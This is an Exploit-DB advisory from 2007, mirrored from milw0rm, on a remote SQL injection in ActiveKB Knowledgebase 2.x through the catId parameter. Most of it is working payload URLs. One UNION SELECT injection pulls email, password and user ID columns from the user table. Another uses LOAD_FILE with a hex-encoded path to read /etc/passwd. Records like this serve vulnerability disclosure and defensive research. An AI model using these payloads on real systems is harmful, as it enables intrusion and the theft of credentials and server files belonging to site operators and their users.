ActiveKB Knowledgebase 2.? catId Remote SQL Injection Vulnerability

2007-09-26T00:00:00
ID EDB-ID:4459
Type exploitdb
Reporter Luna-Tic/XTErner
Modified 2007-09-26T00:00:00

Description

ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability. CVE-2007-5131. Webapps exploit for php platform

                                        
                                             ActiveKB NX 2.? ( Powered by ActiveKB Knowledgebase Software)  (index.php) SQL Injection

                              Discovered by Luna-Tic and XTErner 19 Years Ukrainian Hackers 

Vendor:www.interspire.com/activekb/

License:sharewere

Exploit:/kb/index.php?ToDo=browse&catId=[SQL CODE]
http://www.xxx.net/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user--
https://www.xxx.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/*

# milw0rm.com [2007-09-26]